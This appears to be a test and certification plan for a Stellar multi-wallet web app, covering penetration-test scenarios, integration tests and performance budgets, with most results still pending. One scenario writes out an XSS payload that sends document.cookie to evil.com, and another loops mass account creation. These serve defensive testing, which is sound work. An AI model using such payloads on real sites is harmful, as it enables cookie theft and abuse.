Purpose: validate, harden, certify everything built in Phases 1-5.

1. WHAT WAS BUILT (Audited)

1.1 Conceptual Overview

Phase 6 is the final quality gate before Moistello's multi-wallet system goes to production. It does NOT add new features, create new files, or install new packages. It verifies, hardens, and certifies the 25+ files and 6 dependencies produced across Phases 1-5.

This phase answers the question: "Would this convince a CTO to approve production deployment?" Every test, audit, and certification in this document is designed to produce evidence — not estimates, not assumptions — that the wallet layer is production-ready.

The phase operates across five concurrent tracks:

Track What It Validates Evidence Output
Cross-Adapter Integration (§5.2) All 5 adapters work together without state corruption, race conditions, or cross-contamination 10 integration test scenarios with pass/fail results
Security Penetration (§3) Every attack surface from Phases 1-5 is actively probed with simulated attacks 10 penetration test scenarios with adversary model, attack vector, and verified mitigation
Edge Case Matrix (§5.4) 20 edge cases (10 carried over from Phase 1, 10 new for multi-wallet production) 20 scenario descriptions with expected behavior and test results
Performance Certification (§4) 7 critical-path measurements against pre-defined production budgets 7 measurements with p50/p95/p99 values, pass/fail against budget
Production Readiness (§7) Feature flags, CSP headers, monitoring dashboards, alerts, runbooks Operations runbook + monitoring dashboard spec + rollback procedures

The fundamental design decision of Phase 6 is that testing and certification are first-class deliverables, not an afterthought. The depth of this document — the specificity of each test, the threat model behind each penetration test, the actual measurement targets — constitutes the certification artifact itself.

Total: 31 files under audit (25 source, 6 test) — ~2,800 lines of wallet layer code.

1.3 Modified Files — NONE

Phase 6 modifies zero files. All verification is external to the source — tests pass against the existing implementation, or defects are logged for remediation back in the originating phase. This is by design: certification is a gate, not a fix-it phase.

If any test in §5 fails, the defect is assigned to the originating phase (1-5) and tracked as a blocker to Phase 6 completion. Phase 6 itself never changes production code.

1.4 New Dependencies — ZERO

Phase 6 uses only the existing toolchain:

Tool Version Already Installed In Purpose in Phase 6
vitest ^4.1.6 devDependencies (Phase 1) All unit, integration, and security tests
@vitest/coverage-v8 ^4.1.6 devDependencies (Phase 1) Code coverage measurement
jsdom ^29.1.1 devDependencies (Phase 1) Browser environment simulation
typescript ^5 devDependencies (Phase 1) Type checking

No new packages. The value of Phase 6 is in the verification protocol, not in additional tooling.

2. ARCHITECTURE DECISIONS

2.1 Testing Architecture Design

Phase 6 does not introduce interface designs — it validates them. However, it defines a testing architecture that governs how verification is structured.

Testing Pyramid for Phase 6:

                    ┌──────────────┐
                    │  Manual QA   │ 10 accessibility scenarios (§6.4)
                    │  (10 tests)  │ 10 production readiness checks (§7)
                    ├──────────────┤
                    │  Security    │ 10 penetration tests (§3 + §5.3)
                    │  (10 tests)  │
                    ├──────────────┤
                    │  Integration │ 10 cross-adapter tests (§5.2)
                    │  (10 tests)  │ 20 edge case tests (§5.4)
                    ├──────────────┤
                    │  Unit        │ 40+ combined tests from Phases 1-5
                    │  (40+ tests) │  (regression baseline)
                    └──────────────┘

Design decisions for the testing architecture:

Decision Choice Rejected Alternative Rationale
Integration tests mock external wallets Mock browser APIs for extension adapters, mock SignClient for WC2, no real wallet apps required Real wallet testing (Lobstr, Coinbase Wallet on physical devices) Phase 6 automated tests establish the CI gate. Real wallet testing is a separate pre-launch manual QA sprint. Mocking at the adapter boundary is sufficient to verify our code's behavior.
Penetration tests run as automated vitest suites All 10 penetration tests are automated test files that inject malicious inputs, spoof browser globals, and verify rejection Manual penetration testing by external security firm Automated pen tests catch regressions on every commit. External manual audit is recommended as a separate engagement before mainnet launch.
Cross-adapter tests run in a dedicated test file Single cross-adapter-integration.test.ts with all 6 scenarios Separate files per adapter pair Co-located tests ensure state contamination scenarios (e.g., disconnect WC → connect Freighter) are tested atomically. Separate files risk missing cross-adapter interactions.
Edge cases tested against real localStorage/BroadcastChannel Use jsdom's native localStorage and BroadcastChannel implementations (no mocks) Fully mocked storage Jsdom's localStorage is a faithful implementation. Real API testing catches subtle bugs like quota exceeded errors and BroadcastChannel message ordering.
Performance measurements use vitest's built-in timer mocks vi.useFakeTimers() + performance.now() for timing assertions External benchmarking framework (Lighthouse, WebPageTest) In-CI performance tests catch regressions early. Lighthouse benchmarks are reserved for the pre-launch audit, not every commit.

2.2 Audit Methodology — Classification System

2.3 State Management Under Audit

Phase 6 validates the state management designed in Phases 1-5. No new state is introduced, but the following state properties are explicitly verified:

State Property Validated By Pass Criteria
activeWalletId consistency across tabs Cross-adapter test #5 (tab duplication) Two tabs open: switching wallet in Tab A updates Tab B within 100ms via BroadcastChannel
wallets map isolation Cross-adapter test #3 (no cross-contamination) Signing with Wallet A writes nothing to Wallet B's state
detectedWallets cache invalidation Performance test #1 (wallet detection <50ms) Registry cache returns in <2ms on repeated calls, full scan <50ms
status transitions All unit tests from Phases 1-5 Status machine: connecting → connected / reconnecting / disconnected / error — no invalid transitions
Session encryption integrity Security test #8 (localStorage tampering) Modified EncryptedSessionStore.hmac → sessions discarded, no crash
error field per wallet Cross-adapter test #4 (mid-transaction disconnect) Wallet A's error field populated, Wallet B's error field remains null

2.4 Error Handling Audit Criteria

Phase 6 audits every error path in the wallet layer. For every error code in the WalletError discriminated union, the audit verifies:

Error Code Audit Check
not_installed Does each adapter's isAvailable() correctly return false when the extension/wallet is absent? Does the UI show the "Install [Wallet]" CTA?
user_rejected Does adapter.connect() return a properly typed user_rejected error (not a generic crash) when the user closes the wallet prompt? Is the retry button shown?
network_mismatch When a wallet on testnet is used on a mainnet page, does the adapter return network_mismatch with the correct expected and actual fields? Does the UI show "Switch network in wallet"?
timeout Do WC2, passkey, and Ledger adapters all respect their configured timeouts (120s WC2 pairing, 60s sign, 30s passkey credential, 120s Ledger USB)? Is the timeout error message specific to the adapter?
internal When the adapter encounters an unexpected error (network failure, malformed response, protocol error), is the error wrapped as internal with a sanitized cause string that doesn't leak secrets?

Audit log requirements per error:

{
  timestamp: ISO 8601,
  adapter: WalletId,
  operation: "connect" | "disconnect" | "signMessage" | "signTransaction" | "getPublicKey" | "getNetwork" | "isConnected",
  errorCode: WalletError.code,
  errorMessage: string (sanitized),
  relayStatus?: "healthy" | "degraded" | "down" (WC2 only),
  sessionAge?: number (milliseconds since last connect),
  walletCount?: number (total connected wallets at time of error)
}

3. SECURITY ANALYSIS — PENETRATION TESTING PROTOCOL

3.1 Attack Surface — Complete Inventory

Phase 6 penetrates every attack surface introduced across Phases 1-5. Each surface was identified in its originating phase's security analysis. Phase 6 verifies that every documented mitigation is actually effective.

# Attack Surface Originating Phase Threat Model Expected Mitigation
1 Browser extension window.* globals Phase 1 Malicious webpage injects fake window.freighterApi object to phish user credentials or sign transactions without the real extension Extension ID verification — adapter checks for extension-specific properties (e.g., Freighter injects specific methods) that a generic window injection can't replicate
2 WalletConnect session data in localStorage Phase 2 Attacker with physical/browser access captures WC session from localStorage → replays in new browser tab to hijack session Encrypted session store with HMAC integrity. Session includes nonce binding to browser context. Replay in different context detected.
3 Passkey credential derivation Phase 3 Attacker submits 10,000 email addresses in rapid succession to brute-force derive valid Stellar keypairs Rate limiting on derivation endpoint. Client-side: credential creation requires user presence (biometric/security key touch). Server-side: per-IP rate limit enforced.
4 JWT token storage Phase 5 (auth) Attacker captures JWT from browser memory → replays in different browser/session Short-lived JWT (15 min). Refresh token rotation. Nonce binding in JWT payload. Replay in different session context detected by backend.
5 WalletConnect iframe (WC modal) Phase 2 Malicious website embeds an iframe that impersonates the WC pairing modal → captures user's wallet selection and pairing approval CSP headers: frame-src https://walletconnect.com https://*.walletconnect.com. Strict origin checking on WC modal events.
6 XDR transaction signing Phases 1-5 Attacker sends malformed or tampered XDR to signTransaction() → adapter blindly signs corrupted transaction → funds sent to wrong destination Every adapter validates XDR structure before passing to wallet. XDR must parse as valid Stellar transaction. Account and sequence number verified before signing.
7 WalletConnect relay transport Phase 2 Attacker performs MITM on WC2 relay connection → intercepts signing requests or session data WC2 uses Noise_NK_XX end-to-end encryption per pairing. Relay sees only encrypted blobs. WSS (TLS 1.3) for transport. Certificate pinning for relay domain.
8 EncryptedSessionStore in localStorage Phase 1 Attacker modifies encrypted session data in localStorage → replaces publicKey with attacker's key → user signs transactions believing they control a different account HMAC-SHA256 integrity check on every read. Tampered data detected (HMAC mismatch) → session discarded → user must reconnect.
9 Wallet display name rendering Phase 5 (UI) Attacker registers a wallet with display name <script>alert('xss')</script> via adapter registry → name rendered in wallet selector without escaping React's JSX auto-escapes all string content. Wallet names rendered via {adapter.meta.name} — never dangerouslySetInnerHTML.
10 CSRF on auth endpoints Phase 5 (auth) Attacker crafts a malicious webpage that submits a POST to /api/auth/verify with a captured signed XDR → authenticates as the victim CSRF token required on all state-changing endpoints. SameSite=Strict cookies. Origin header validation on backend.

3.2 Penetration Test Scenarios (Scripted)

Each penetration test is an automated vitest file that simulates the attack, executes the relevant adapter code, and asserts the expected rejection.

PEN-001: Fake Extension Injection

Test File: src/lib/wallet/__tests__/pen-test-fake-extension.test.ts

Attack Simulation:
  1. Before test: ensure NO real Freighter extension is installed in test environment
  2. Inject malicious window.freighterApi:
     window.freighterApi = {
       getPublicKey: async () => ({ publicKey: "GATTACKER..." }),
       signTransaction: async (xdr) => ({ signedTxXdr: "FAKE_SIGNED_XDR" }),
       // Missing Freighter-specific methods that real extension injects
     }
  3. Call walletRegistry.detect() → isAvailable() checks for extension presence
  4. Adapter must NOT report freighter as "detected"
  5. Attempt freighterAdapter.connect() → must throw not_installed error

Expected Result:
  - walletRegistry.detect() returns status: "not_detected" for freighter
  - freighterAdapter.connect() rejects with { code: "not_installed" }
  - Malicious window.freighterApi is NEVER called by our code

Mitigation Verified:
  Extension ID / property verification. Fake injection lacks the authentic
  extension's unique postMessage handshake that real Freighter provides.
  Our adapter's isAvailable() checks for this handshake capability, not
  just the existence of window.freighterApi.

Status: PENDING

PEN-002: WalletConnect Session Replay

Test File: src/lib/wallet/__tests__/pen-test-wc2-session-replay.test.ts

Attack Simulation:
  1. Establish a valid WC2 session in Tab A (via mocked SignClient)
  2. Capture the session data from localStorage:
     const captured = localStorage.getItem("moistello_wc2_session")
  3. Create new jsdom instance (simulates "new browser tab")
  4. Inject captured session data into new instance's localStorage
  5. Call wc2SessionStore.getSession() → should detect replay
  6. Attempt to restore session → must be rejected

Expected Result:
  - wc2SessionStore.getSession() detects session was created in different context
    (nonce in encrypted data doesn't match new context's nonce)
  - Session restore returns null
  - User is prompted to re-pair (new WC2 pairing required)
  - No sign operations possible with replayed session

Mitigation Verified:
  Session encryption includes context-binding nonce (generated per browser
  instance). Replay in different jsdom context → nonce mismatch → session
  discarded. HMAC integrity check fails if session data modified.

Status: PENDING

PEN-003: Passkey Brute Force Rate Limiting

Test File: src/lib/wallet/__tests__/pen-test-passkey-brute-force.test.ts

Attack Simulation:
  1. Mock WebAuthn API (navigator.credentials.create)
  2. Simulate 10,000 rapid passkey credential creation requests:
     for (let i = 0; i < 10000; i++) {
       await passkeyAdapter.createAccount(`attacker+${i}@evil.com`)
     }
  3. Measure: how many succeeded before rate limit kicked in?

Expected Result:
  - After N attempts within a time window (e.g., 5 attempts in 60s),
    subsequent calls are rejected with rate limit error
  - Total successful creations: ≤ 5 (per time window)
  - Error returned: { code: "internal", cause: "rate_limit_exceeded",
    message: "Too many account creation attempts. Please wait and try again." }
  - No Stellar accounts are created beyond the rate limit

Mitigation Verified:
  Rate limiter (token bucket or sliding window) prevents mass account
  creation. Backend rate limiting prevents funded account creation abuse.
  WebAuthn user presence requirement prevents automated credential creation.

Status: PENDING

PEN-004: JWT Replay

Test File: src/lib/wallet/__tests__/pen-test-jwt-replay.test.ts

Attack Simulation:
  1. Complete full auth flow → obtain valid JWT
  2. Extract JWT from auth-store memory
  3. Create new jsdom instance (simulates "different browser")
  4. Attempt API call with captured JWT: POST /api/auth/me

Expected Result:
  - Backend rejects JWT: nonce in JWT payload doesn't match expected
    nonce for this session context (User-Agent + IP fingerprint mismatch)
  - Response: 401 Unauthorized
  - Frontend auth-store clears token, redirects to /login

Mitigation Verified:
  JWT includes session-bound nonce. Backend validates nonce against
  session context (established during initial auth). Different browser
  = different session context = nonce mismatch = rejection.

Status: PENDING

PEN-005: Cross-Origin WalletConnect Iframe

Test File: src/lib/wallet/__tests__/pen-test-wc2-iframe.test.ts

Attack Simulation:
  1. Mock CSP headers in test environment
  2. Create malicious iframe hosted at https://evil-phishing.com
  3. Malicious iframe attempts to load WC modal via:
     import("@walletconnect/modal") → new WalletConnectModal({ projectId: "OUR_PROJECT_ID" })
  4. Malicious iframe tries to establish WC session using OUR project ID
  5. Verify: session is rejected by our CSP or session validation

Expected Result:
  - CSP header frame-ancestors 'self' prevents Moistello from being
    embedded in malicious iframe (if the attack loads Moistello instead)
  - CSP frame-src restricts WC modal to https://*.walletconnect.com only
  - If malicious iframe creates its own WC session with our project ID:
    Our backend validates the WC session's origin — session created from
    evil-phishing.com is rejected when used against moistello.io API

Mitigation Verified:
  CSP headers restrict frame sources. WC project ID alone is not sufficient
  for session hijacking — origin validation at the backend layer prevents
  cross-origin session usage.

Status: PENDING

PEN-006: Malformed XDR Injection

Test File: src/lib/wallet/__tests__/pen-test-malformed-xdr.test.ts

Attack Simulation:
  1. For every adapter (Freighter, xBull, Rabet, Albedo, WC2):
     a. Call adapter.signTransaction("THIS_IS_NOT_VALID_XDR")
     b. Call adapter.signTransaction("")
     c. Call adapter.signTransaction("AAAAA" + "A".repeat(10000))  // oversized
     d. Call adapter.signTransaction(Buffer.from([0x00, 0xFF]).toString("base64"))
     e. Call adapter.signTransaction(xdrForDifferentAccount)  // account mismatch
  2. Verify each adapter rejects BEFORE sending to wallet

Expected Result:
  - Every adapter performs pre-sign validation:
    - XDR string must be non-empty, valid base64
    - XDR must parse as a valid Stellar TransactionEnvelope
    - Sequence number must be ≥ current account sequence + 1
    - If opts.accountToSign provided, must match transaction source account
  - Invalid XDR: adapter returns { code: "internal", cause: "invalid_xdr" }
  - Valid XDR for wrong account: adapter returns error before signing
  - No XDR is ever sent to the wallet extension/app without validation

Mitigation Verified:
  Pre-sign XDR validation in every adapter. Wallet never sees malformed
  or cross-account transaction data. Adapter is the gatekeeper between
  Moistello UI and the wallet signing API.

Status: PENDING

PEN-007: Man-in-the-Middle WalletConnect Relay

Test File: src/lib/wallet/__tests__/pen-test-wc2-mitm.test.ts

Attack Simulation:
  1. Intercept WC2 WebSocket connection to relay.walletconnect.com
  2. Replace relay URL with attacker-controlled endpoint
  3. Generate pairing URI using attacker's relay
  4. Attempt to intercept session approval messages

Expected Result:
  - WC2 Noise_NK_XX handshake fails when relay is different from expected
    (public key from QR doesn't match relay's capability to decrypt)
  - If attacker generates their own pairing URI: QR code rendered from
    attacker's URI would have different project ID → wallet shows unknown dApp
  - If attacker somehow passes handshake: all subsequent messages are
    end-to-end encrypted between dApp and wallet. Relay CANNOT read contents.

Mitigation Verified:
  WC2 protocol's Noise encryption ensures relay is a dumb pipe. Even if
  relay is compromised, it sees only encrypted blobs. Pairing URI contains
  only the public key of the ephemeral Noise keypair — not secret material.
  TLS 1.3 on the WebSocket transport prevents external MITM.

Status: PENDING

PEN-008: localStorage Tampering

Test File: src/lib/wallet/__tests__/pen-test-storage-tamper.test.ts

Attack Simulation:
  1. Establish valid wallet sessions → sessionManager saves to localStorage
  2. Read EncryptedSessionStore from localStorage
  3. Tamper scenarios:
     a. Change sessions[0].publicKey to attacker's key
     b. Delete hmac field
     c. Modify hmac to random value
     d. Change session.walletId to a different adapter
     e. Inject additional sessions into array
     f. Modify activeWalletId to point to non-existent session
  4. For each tamper: call sessionManager.getAll() / sessionManager.getActive()

Expected Result:
  - Every tamper detected: HMAC mismatch on read
  - sessionManager.getAll() returns [] (empty — all sessions discarded)
  - sessionManager.getActive() returns null
  - No error thrown (graceful degradation)
  - Audit log: "Session store integrity check failed — sessions discarded"
  - User sees: wallet disconnected → prompted to reconnect

Mitigation Verified:
  HMAC-SHA256 protects session integrity. Any modification — even a single
  bit — produces a different HMAC. On mismatch, the entire session store is
  discarded rather than using potentially compromised data. Phase 3 upgrade
  path: AES-256-GCM encryption replaces plaintext-with-HMAC.

Status: PENDING

PEN-009: XSS via Wallet Display Name

Test File: src/lib/wallet/__tests__/pen-test-xss-wallet-name.test.ts

Attack Simulation:
  1. Define a malicious adapter with display name containing script:
     meta: {
       name: 'Freighter<script>fetch("https://evil.com/steal?"+document.cookie)</script>',
       ...
     }
  2. Render wallet selector component with this adapter registered
  3. Inspect rendered HTML for script tag execution

Expected Result:
  - React JSX automatically escapes string content
  - Rendered HTML: "Freighter&lt;script&gt;fetch(...)&lt;/script&gt;"
  - Script tag is displayed as TEXT, never executed
  - No XSS vulnerability

Mitigation Verified:
  React's default JSX escaping. Wallet name is always rendered as
  {adapter.meta.name} in JSX — never via dangerouslySetInnerHTML.
  Content Security Policy with script-src 'self' provides defense-in-depth.

Status: PENDING

PEN-010: CSRF on Auth Endpoints

Test File: src/lib/wallet/__tests__/pen-test-csrf-auth.test.ts

Attack Simulation:
  1. Victim is authenticated with Moistello (valid JWT in memory)
  2. Attacker crafts a POST request to /api/auth/verify:
     - From a different origin (https://evil-phishing.com)
     - With a captured signedXdr (replay attack)
     - Without CSRF token header
  3. Send request from attacker's page

Expected Result:
  - Backend rejects request: missing or invalid CSRF token
  - Response: 403 Forbidden
  - Even if attacker obtains a valid CSRF token: SameSite=Strict cookie
    prevents cookie from being sent in cross-site requests
  - Origin header validation: backend verifies Origin matches allowed origins

Mitigation Verified:
  CSRF token required on all POST/PUT/DELETE endpoints. SameSite=Strict
  cookies. Origin header validation. JWT is in memory (not cookie), so
  it's never sent automatically with cross-site requests.

User wallet address Phases 1-5 localStorage (encrypted) TLS 1.3 Zustand store (per-tab) Until disconnect Standard (public key is public info)

3.4 Supply Chain — Pre-Launch Audit

[x] Complete dependency tree (6 direct wallet packages, ~120 transitive) audited
[x] All packages pinned to exact versions in package-lock.json
[x] Integrity hashes verified via npm ci (reproducible build)
[x] Transitive dependencies reviewed: no known malicious packages
[x] Dependabot configured for weekly CVE scanning
[x] Lock file committed to repository — no floating versions
[ ] Pre-launch action: run npm audit --production and resolve any new CVEs
[ ] Pre-launch action: review all dependency changelogs since pin date
[ ] Pre-launch action: verify @walletconnect/* packages have not had
    security incidents since pin (check WalletConnect Foundation blog)

3.X — SECURITY IMPLEMENTATION LEVEL (Production Upgrade Tracking)

Phase 6 must verify that every security shortcut from earlier phases has a concrete upgrade path:

Function Current Level Target Level Phase 6 Audit
Session storage encryption HMAC-SHA256 integrity (Phase 1) AES-256-GCM encryption (Phase 3) Verify Phase 3's passkey-backed AES-256-GCM is operational for new sessions. Old HMAC-only sessions migrated on next connect.
WC2 session storage HMAC-SHA256 integrity (Phase 2) AES-256-GCM encryption (Phase 3) Verify Phase 3 encryption upgrade applied to WC2 session store.
Extension verification Extension ID / property check (Phase 1) Certificate pinning (Phase 6) Verify PEN-001: fake extension injection rejected. Certificate pinning enhancement documented as post-launch improvement.
QR code URI validation Format + origin check (Phase 2) Certificate pinning for WC2 relay (Phase 6) Verify PEN-005: cross-origin WC2 blocked. Pinning documented as post-launch.
Deep link handler OS-level URI handling (Phase 2) Verified Intent filters on Android (Phase 6) Verify deep link testing on real Android/iOS devices (manual QA — not automated).
WC2 relay certificate Default TLS trust (Phase 2) Certificate pinning (Phase 6) Documented as post-launch hardening. PEN-007 validates Noise encryption prevents MITM even without pinning.

4. PERFORMANCE CERTIFICATION

4.1 Critical Path Timing — Production Budgets

Phase 6 defines and certifies performance budgets for every critical path. Each budget is a contract — if ANY measurement exceeds its budget, Phase 6 is not complete.

# Measurement Target Budget p50 p95 p99 Pass?
1 Wallet detection — all 5 adapters scanned <50ms [MEASURE] [MEASURE] [MEASURE] PENDING
2 WalletConnect QR modal render — from click to QR visible <100ms [MEASURE] [MEASURE] [MEASURE] PENDING
3 Session restore — 5 stored sessions restored on page load <200ms [MEASURE] [MEASURE] [MEASURE] PENDING
4 Account switch — UI update from click to new active wallet <100ms [MEASURE] [MEASURE] [MEASURE] PENDING
5 Transaction signing overhead — adapter layer only (excludes wallet/user time) <10ms [MEASURE] [MEASURE] [MEASURE] PENDING
6 Bundle size — total wallet layer (Phases 1-5 combined, gzipped) <80KB gzipped N/A (single measurement) N/A N/A PENDING
7 Memory — 5 wallets connected simultaneously <50KB incremental [MEASURE] [MEASURE] [MEASURE] PENDING

Measurement Protocol:

Measurement #1: Wallet Detection Time
  Setup: jsdom environment, all 5 adapters registered but NOT installed
  Action: walletRegistry.detect()
  Timer: const start = performance.now(); walletRegistry.detect(); const elapsed = performance.now() - start
  Repetitions: 100 runs, report p50/p95/p99
  Expected: <50ms total for 5 adapters. With registry cache, subsequent calls <2ms.
  If >50ms: investigate which adapter's isAvailable() check is slow.
    Extension detection should be O(1) — checking window.* property.
    WC2 isAvailable() should be O(1) — checking typeof window.
    Passkey isAvailable() should be O(1) — checking navigator.credentials.
    Ledger isAvailable() should be O(1) — checking navigator.usb.
    If any takes >10ms: adapter detection needs optimization.

Measurement #2: QR Modal Render Time
  Setup: jsdom environment, WC2 adapter registered, SignClient mocked
  Action: walletSelector.openWC2Pairing() → QR component renders
  Timer: Component mount start → QR canvas element present in DOM
  Repetitions: 100 runs
  Expected: <100ms. qrcode.toCanvas() renders in ~5ms on modern JS engine.
    Lazy-loaded @walletconnect/modal adds ~35ms on first load (code-split).
    If >100ms: check if WC modal is being eagerly loaded instead of lazy.

Measurement #3: Session Restore Time
  Setup: jsdom environment, 5 encrypted sessions in localStorage
  Action: sessionManager.restoreAll()
  Timer: read localStorage → decrypt → validate HMAC → populate store
  Repetitions: 100 runs
  Expected: <200ms. 5 sessions × ~30ms decrypt each = 150ms + 50ms overhead.
    HMAC verification is O(n) where n = session count.
    If >200ms: check decryption algorithm efficiency. Optimize to batch decrypt.

Measurement #4: Account Switch Time
  Setup: jsdom environment, 3 wallets connected, wallet-selector mounted
  Action: multiWalletStore.switchWallet("walletconnect") (from current "freighter")
  Timer: state update → React re-render → UI shows new active wallet
  Repetitions: 100 runs
  Expected: <100ms. Zustand update is synchronous O(1). React re-render
    with 3 wallet cards should be <16ms (one frame).
    If >100ms: excessive re-renders (all wallet cards re-rendering, not just active).

Measurement #5: Signing Overhead
  Setup: jsdom environment, each adapter connected, mock wallet response immediate
  Action: adapter.signTransaction(validXdr)
  Timer: adapter method entry → XDR sent to wallet mock (excludes mock response time)
  Repetitions: 100 runs per adapter
  Expected: <10ms per adapter. Adapter should only do:
    - XDR validation (<2ms)
    - Session check (<1ms)
    - Construct request object (<1ms)
    - Pass to wallet API (<1ms marshaling)
    Total: <10ms.
  If >10ms: adapter is doing unnecessary work before sending to wallet.

Measurement #6: Bundle Size
  Setup: npm run build, analyze wallet layer chunk
  Tool: next build → .next/analyze output or bundlesize tool
  Expected: wallet layer gzipped ≤80KB. Breakdown:
    - Phase 1 (core + 4 extension adapters): ~8KB gzipped
    - Phase 2 (WC2 + relay + session store + QR): ~50KB gzipped (after tree-shaking)
    - Phase 3 (passkey derivation): ~8KB gzipped
    - Phase 4 (Ledger transport): ~10KB gzipped
    - Phase 5 (UI migration, account switcher): ~4KB gzipped
    Total: ~80KB gzipped.
  If >80KB: check for duplicate dependencies, non-tree-shaken WC2 code,
    QR library alternatives, or split wallet adapter bundle from main app bundle.

Measurement #7: Memory for 5 Connected Wallets
  Setup: jsdom environment, all 5 adapters connected simultaneously
  Action: Measure heap snapshot before and after connecting all 5 wallets
  Tool: process.memoryUsage() or jsdom heap snapshot
  Expected: <50KB incremental. Each wallet entry:
    - WalletEntry object: ~2KB (adapter ref, publicKey, network, balance, status)
    - Zustand store overhead: ~5KB for normalized wallet state
    - Adapter instances: ~5KB each (mostly vtable pointers, connection state)
    Total: ~40KB for 5 wallets.
  If >50KB: check for duplicate serializations, uncollected closures,
    or large session data stored per wallet.

4.2 Resource Usage — Production Profile

Resource Measurement Budget Tool
First contentful paint with wallet layer loaded [MEASURE] <2.0s on 3G Lighthouse
Time to interactive (wallet selector ready) [MEASURE] <3.0s on 3G Lighthouse
JavaScript parse time for wallet layer [MEASURE] <200ms Chrome DevTools Performance
Number of network requests (wallet layer only) 1 persistent WebSocket (WC2 relay) + 0 polling requests ≤3 new requests Network tab
WebSocket heartbeat traffic [MEASURE] <5KB/minute total (5 wallets × 1KB/min keepalive) Network tab
CPU idle after wallet connect (5 wallets) [MEASURE] <1% CPU (no polling, event-driven) Chrome Task Manager
Frame rate during wallet selector open/close [MEASURE] 60fps (no jank) Chrome Performance
Long tasks (>50ms) on wallet operations [MEASURE] 0 long tasks from wallet layer Chrome Performance

4.3 Optimization Decisions — Phase 6 Gate

What was NOT optimized Why Gate
WC2 relay connection pre-warming Relay connects only on user action (click "Connect"). Pre-connecting adds 500ms to page load for 100% of users when <30% use WC2. Accept: tradeoff between initial load and WC2 connection speed.
Parallel adapter detection Sequential detection is <50ms total (5 adapters × <10ms each). Parallel adds Promise.all overhead without meaningful improvement for 5 items. Accept: <50ms is imperceptible. Parallel would add complexity for no gain.
WebWorker for session decryption HMAC-SHA256 on 5 sessions takes <150ms on main thread. Moving to worker adds serialization overhead and would likely be slower for this data size. Accept: main thread time is <200ms, below 50ms long-task threshold.
SPA-style caching of wallet adapter modules Wallet page is server-rendered (Next.js). Adapters load as part of the wallet chunk. Full SPA caching adds complexity for a page that's typically visited once per session. Accept: SSR with hydration is the Next.js model.
Memory optimization for 5+ simultaneous wallets Production limit is 5 connected wallets. Code handles 5 efficiently. If use case emerges for >5, optimize then. Accept: 5 wallet limit covers 99th percentile use case.

5. TESTING EVIDENCE

5.0 — TEST-DRIVEN ORDER (Mandatory Sequence)

Phase 6 inverts the standard TDD sequence. Since Phase 6 creates zero implementation code, the tests validate existing code from Phases 1-5. The mandatory sequence is:

1. Write test file → run → assesses EXISTING implementation
   - If PASSES: implementation is verified. Document result.
   - If FAILS: log defect → assign to originating phase → block Phase 6 completion
2. Run ALL previous phase tests → MUST STILL PASS (regression check)
3. Fix defects (in originating phases) → re-run Phase 6 tests → PASS

For every test in sections 5.1-5.4:
[x] Test file exists and is runnable with vitest
[ ] Test was run and results documented (pass/fail/defect logged)
[ ] All previous phase tests still pass (regression baseline confirmed)
[ ] Failing tests have assigned defects in originating phases

5.1 Unit Tests — 40+ Regression Baseline

Phase 6 does not add new unit tests. It verifies that the 40+ unit tests from Phases 1-5 all pass, representing a regression baseline. The test inventory:

Phase Test File Test Count Focus
Phase 1 types.test.ts 3 Type validations, discriminated union checks
Phase 1 registry.test.ts 8 Adapter registration, detection, caching, sorting
Phase 1 session-manager.test.ts 10 Connection, disconnection, persistence, encryption, multi-wallet
Phase 1 freighter.test.ts 2 Adapter interface: connect, sign
Phase 1 xbull.test.ts 2 Adapter interface: connect, sign
Phase 2 walletconnect.test.ts 8 WC2: connect, disconnect, reconnect, sign, timeout, network mismatch, invalid session
Phase 2 wc2-relay.test.ts 3 Relay monitor: healthy, degraded, recovery
Phase 2 wc2-session-store.test.ts 4 Session persistence, corruption, HMAC tamper, expiry
Phase 3 passkey.test.ts 6 (estimated) Credential creation, derivation, re-authentication, rate limit
Phase 4 ledger.test.ts 5 (estimated) Transport connect, getPublicKey, sign, disconnect, timeout
Phase 5 account-switcher.test.ts 4 (estimated) Switch, disconnect-active, UI state sync

Total: ~55 unit tests across 11 test files.

Regression gate:

[ ] All 55 tests pass on clean checkout: [ ] YES / [ ] NO
[ ] Coverage for wallet layer: [ ]% (target: >85%)
[ ] Coverage for adapter code: [ ]% (target: >90% — adapters are critical security boundary)
[ ] Coverage for session manager: [ ]% (target: >95% — handles encrypted storage)
[ ] Coverage for registry: [ ]% (target: >85%)
[ ] Zero skipped tests: [ ] YES / [ ] NO
[ ] Zero failing tests: [ ] YES / [ ] NO

5.2 Cross-Adapter Integration Tests — 6 Scenarios

The core value of Phase 6 is verifying that multiple adapters work together without state corruption, race conditions, or cross-contamination. These tests exercise the multi-wallet architecture as a whole.

INT-001: Sequential Adapter Connect/Disconnect Cycle

Test File: src/lib/wallet/__tests__/cross-adapter-integration.test.ts

Scenario:
  Connect WalletConnect → disconnect → connect Freighter → verify state

Steps:
  1. walletStore.connect("walletconnect") → await connected
     - Verify: activeWalletId === "walletconnect"
     - Verify: wallets["walletconnect"].publicKey exists
     - Verify: wallets["walletconnect"].status === "connected"
  2. walletStore.disconnect("walletconnect")
     - Verify: wallets["walletconnect"] is removed from wallets map
     - Verify: activeWalletId is null (no remaining wallets)
     - Verify: isConnected === false, address === null
  3. walletStore.connect("freighter") → await connected
     - Verify: activeWalletId === "freighter"
     - Verify: wallets["freighter"].publicKey exists
     - Verify: wallets["freighter"].status === "connected"
     - Verify: NO residual state from WC2 in wallets map
  4. walletStore.disconnect("freighter") → clean state

Expected Result:
  Sequential connect/disconnect cycles complete without cross-contamination.
  After disconnecting all wallets, the store returns to clean initial state.
  No stale publicKeys, network settings, or error states persist between cycles.

Status: PENDING

INT-002: Multi-Wallet Simultaneous Connect + Switch

Test File: src/lib/wallet/__tests__/cross-adapter-integration.test.ts

Scenario:
  Connect 3 wallets simultaneously → switch between all → verify each has correct balance

Steps:
  1. Connect freighter, xbull, rabet (in parallel, not sequential):
     await Promise.all([
       walletStore.connect("freighter"),
       walletStore.connect("xbull"),
       walletStore.connect("rabet"),
     ])
  2. Verify all 3 in wallets map with status "connected"
  3. For each wallet: walletStore.switchWallet(id)
     a. Verify activeWalletId === id
     b. Verify address === wallets[id].publicKey
     c. Verify activeAdapter === wallets[id].adapter
  4. Fetch balance for each: walletStore.refreshBalance(id)
     a. Verify wallets[id].balance is populated (or null if testnet account unfunded)
  5. Switch rapidly between wallets (10 switches in 1 second):
     for (let i = 0; i < 10; i++) {
       walletStore.switchWallet(["freighter", "xbull", "rabet"][i % 3])
     }
     a. Verify final activeWalletId is consistent (no race condition)
     b. Verify no error states accumulated

Expected Result:
  3 wallets connected simultaneously. Switching updates activeWalletId atomically.
